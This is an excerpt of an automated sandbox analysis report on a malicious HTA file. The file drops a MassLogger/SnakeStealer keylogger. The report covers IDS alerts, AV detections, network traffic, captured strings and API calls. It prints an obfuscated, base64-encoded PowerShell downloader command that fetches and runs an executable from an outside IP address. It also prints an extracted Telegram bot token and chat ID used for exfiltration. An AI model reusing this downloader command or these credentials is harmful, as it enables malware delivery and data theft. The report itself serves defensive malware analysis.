)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5308, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.cmdline", ProcessId: 6844, ProcessName: csc.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-03-17T01:19:05.711080+010020220501A Network Trojan was detected23.95.235.2880192.168.2.649695TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-03-17T01:19:05.855949+010020220511A Network Trojan was detected23.95.235.2880192.168.2.649695TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-03-17T01:19:12.426210+010028032742Potentially Bad Traffic192.168.2.649696158.101.44.24280TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\csoss.exeAvira: detection malicious, Label: TR/AD.SnakeStealer.ergur
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\csoss[1].exeAvira: detection malicious, Label: TR/AD.SnakeStealer.ergur
                    Found malware configuration
                    Source: 00000007.00000002.2509390080.00000000024F1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7598843355:AAHehybWWiULdkPS1RLFstdr4_yw-SdkoII", "Telegram Chatid": "7668947425"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\csoss[1].exeReversingLabs: Detection: 83%
                    Source: C:\Users\user\AppData\Roaming\csoss.exeReversingLabs: Detection: 83%
                    Multi AV Scanner detection for submitted file
                    Source: needagoodplanforsuccesstogetbackbest.htaVirustotal: Detection: 40%Perma Link
                    Source: needagoodplanforsuccesstogetbackbest.htaReversingLabs: Detection: 27%
                    Joe Sandbox ML detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability

                    Location Tracking

                    barindex
                    Tries to detect the country of the analysis system (by using the IP)
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49697 version: TLS 1.0
                    Source: Binary string: wntdll.pdbUGP source: csoss.exe, 00000006.00000003.1394760413.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, csoss.exe, 00000006.00000003.1395803435.0000000003970000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: csoss.exe, 00000006.00000003.1394760413.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, csoss.exe, 00000006.00000003.1395803435.0000000003970000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: q:C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.pdb source: powershell.exe, 00000003.00000002.1400376615.0000000004B4A000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D6445A GetFileAttributesW,FindFirstFileW,FindClose,6_2_00D6445A
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D6C6D1 FindFirstFileW,FindClose,6_2_00D6C6D1
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D6C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,6_2_00D6C75C
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D6EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00D6EF95
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D6F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00D6F0F2
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D6F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_00D6F3F3
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00D637EF
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D63B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00D63B12
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D6BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_00D6BCBC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00965782h7_2_00965358
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 009651B9h7_2_00964F08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00965782h7_2_009656AF

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 23.95.235.28:80 -> 192.168.2.6:49695
                    Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 23.95.235.28:80 -> 192.168.2.6:49695
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 17 Mar 2025 00:19:04 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 13 Mar 2025 12:29:25 GMTETag: "ef800-6303878f4d6d6"Accept-Ranges: bytesContent-Length: 980992Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 1c ad cf 72 7d c3 9c 72 7d c3 9c 72 7d c3 9c 34 2c 22 9c 70 7d c3 9c ec dd 04 9c 73 7d c3 9c 7f 2f 1c 9c 41 7d c3 9c 7f 2f 23 9c c3 7d c3 9c 7f 2f 22 9c 47 7d c3 9c 7b 05 40 9c 7b 7d c3 9c 7b 05 50 9c 57 7d c3 9c 72 7d c2 9c 52 7f c3 9c 0f 04 29 9c 22 7d c3 9c 0f 04 1c 9c 73 7d c3 9c 7f 2f 18 9c 73 7d c3 9c 72 7d 54 9c 73 7d c3 9c 0f 04 1d 9c 73 7d c3 9c 52 69 63 68 72 7d c3 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 79 cf d2 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 de 08 00 00 16 06 00 00 00 00 00 cd 7d 02 00 00 10 00 00 00 f0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0f 00 00 04 00 00 b6 19 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c a4 0b 00 7c 01 00 00 00 70 0c 00 00 6f 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0e 00 1c 71 00 00 c0 2b 09 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 48 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 08 00 84 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 dc 08 00 00 10 00 00 00 de 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0e e1 02 00 00 f0 08 00 00 e2 02 00 00 e2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 8f 00 00 00 e0 0b 00 00 52 00 00 00 c4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 6f 02 00 00 70 0c 00 00 70 02 00 00 16 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 71 00 00 00 e0 0e 00 00 72 00 00 00 86 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
                    Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
                    Source: Joe Sandbox ViewIP Address: 23.95.235.28 23.95.235.28
                    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49696 -> 158.101.44.242:80
                    Source: global trafficHTTP traffic detected: GET /120/csoss.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 23.95.235.28Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.6:49697 version: TLS 1.0
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04487A38 URLDownloadToFileW,3_2_04487A38
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /120/csoss.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 23.95.235.28Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: powershell.exe, 00000003.00000002.1400376615.0000000004B4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.28/120/csoss.ex
                    Source: powershell.exe, 00000003.00000002.1400376615.0000000004B4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.28/120/csoss.exe
                    Source: powershell.exe, 00000003.00000002.1413448646.0000000007C72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.28/120/csoss.exeSs
                    Source: RegSvcs.exe, 00000007.00000002.2509390080.0000000002570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                    Source: RegSvcs.exe, 00000007.00000002.2509390080.0000000002570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
                    Source: RegSvcs.exe, 00000007.00000002.2509390080.0000000002570000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2509390080.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: RegSvcs.exe, 00000007.00000002.2509390080.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: RegSvcs.exe, 00000007.00000002.2509390080.0000000002570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
                    Source: csoss.exe, 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: RegSvcs.exe, 00000007.00000002.2509390080.0000000002570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
                    Source: powershell.exe, 00000003.00000002.1402259894.00000000056C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000003.00000002.1400376615.00000000047B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: RegSvcs.exe, 00000007.00000002.2509390080.000000000258D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                    Source: RegSvcs.exe, 00000007.00000002.2509390080.000000000258D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
                    Source: powershell.exe, 00000003.00000002.1400376615.00000000047B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000003.00000002.1400376615.0000000004661000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2509390080.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000003.00000002.1400376615.00000000047B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000003.00000002.1400376615.00000000047B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000003.00000002.1400376615.0000000004661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                    Source: powershell.exe, 00000003.00000002.1400376615.00000000047B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                    Source: csoss.exe, 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                    Source: powershell.exe, 00000003.00000002.1402259894.00000000056C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000003.00000002.1402259894.00000000056C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000003.00000002.1402259894.00000000056C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000003.00000002.1400376615.00000000047B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000003.00000002.1399303841.00000000005E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com64/WindowsPowerShell/v1.0/Author=
                    Source: powershell.exe, 00000003.00000002.1402259894.00000000056C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: RegSvcs.exe, 00000007.00000002.2509390080.0000000002570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                    Source: csoss.exe, 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2509390080.0000000002570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: RegSvcs.exe, 00000007.00000002.2509390080.0000000002570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
                    Source: RegSvcs.exe, 00000007.00000002.2509390080.0000000002570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 6.2.csoss.exe.eb0000.1.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D74164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_00D74164
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D74164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_00D74164
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D73F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,6_2_00D73F66
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D6001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,6_2_00D6001C
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D8CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,6_2_00D8CABC

                    System Summary

                    barindex
                    Detected Cobalt Strike Beacon
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'JEdhICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlcmRFRmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ1dRaXBNREdkcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamdrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFaXpjTUh2dkJaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVEdORG9HcUNLRyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWR1ZhbyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMjAvY3Nvc3MuZXhlIiwiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtzVGFyVC1zbEVFcCgzKTtJblZvS0UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[cHar]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'JEdhICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlcmRFRmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ1dRaXBNREdkcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamdrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFaXpjTUh2dkJaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVEdORG9HcUNLRyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWR1ZhbyAgICAgICAgICAgICAgICAgICAgICAgI